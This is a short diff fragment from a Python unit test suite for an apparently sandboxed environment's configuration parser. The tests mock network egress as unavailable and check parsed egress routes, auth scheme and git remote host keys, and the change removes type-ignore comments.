def open(self, *args, **kwargs): # noqa: ANN001, ANN002, ANN003
raise OSError("egress unavailable")
with patch.object(supervise_server.urllib.request, "build_opener", return_value=_Opener()):
+4 -4
View File
@@ -273,18 +273,18 @@ class TestRealisticBottleFile(unittest.TestCase):
KnownHostKey: ssh-ed25519 AAAA...
""")
# Spot-check the deep parts; the structure is large.
self.assertEqual(2, len(out["egress"]["routes"])) # type: ignore
self.assertEqual(2, len(out["egress"]["routes"]))
self.assertEqual(
["/didericis/"],
out["egress"]["routes"][1]["path_allowlist"], # type: ignore
out["egress"]["routes"][1]["path_allowlist"],
)
self.assertEqual(
"Bearer",
out["egress"]["routes"][0]["auth"]["scheme"], # type: ignore
out["egress"]["routes"][0]["auth"]["scheme"],
)
self.assertEqual(
"ssh-ed25519 AAAA...",
out["git"]["remotes"]["gitea.dideric.is"]["KnownHostKey"], # type: ignore
out["git"]["remotes"]["gitea.dideric.is"]["KnownHostKey"],
)